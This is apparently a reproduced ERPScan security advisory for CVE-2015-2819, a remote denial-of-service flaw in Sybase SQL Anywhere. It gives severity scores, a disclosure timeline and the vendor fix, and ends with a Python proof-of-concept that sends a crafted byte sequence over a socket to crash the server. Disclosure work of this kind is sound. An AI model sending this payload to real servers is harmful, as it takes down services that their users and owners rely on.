CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EPSS: 0.005 Low
Percentile: 73.6%
Application: Sybase SQL Anywhere 11 and 16
Vendor URL: <http://www.sybase.com>
Bugs: DoS
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 15.03.2015
Reference: SAP Security Note 2108161
Authors: Vahagn Vardanyan (ERPScan)
Class: DoS [CWE-122]
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2819
It is possible to use a denial of service vulnerability to terminate the process of the vulnerable component. As a result, nobody can use this service, which negatively affects business processes. System downtime also harms business reputation.
An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.
SYBASE SQL Anywhere 12 and 16
Other versions are probably affected too, but they were not checked.
To correct this vulnerability, install SAP Security Note 2108161.
An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.
```python
import socket

# Request bytes as published in the advisory.
PoC = "\x1b\x00\x00\x50\x00\x00\x00\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54" \
      "\x49\x4f\x4e\x4c\x45\x53\x53\x5f\x54\x44\x53\x00\x00\x00\x01\x00" \
      "\x00\x04\x08\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00" \
      "\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33" \
      "\x5f\x70\x72\x69\x6d\x61\x72\x79\x00\x1b\x00\x00\x50\x00\x00\x00" \
      "\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54\x49\x4f\x4e\x4c\x45\x53\x53" \
      "\x5f\x54\x44\x53\x00\x00\x00\x01\x00\x00\x04\x00\x05\x00\x06\x00" \
      "\x00\x01\x02\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00" \
      "\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33" \
      "\x5f\x70\x72\x69\x6d\x61\x72\x79\x00"

# SERVER_IP and SERVER_PORT are placeholders that the advisory leaves undefined.
s = socket.socket()
s.settimeout(1)
s.connect((SERVER_IP, SERVER_PORT))
s.send(PoC)
print(PoC)
s.close()
```
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services: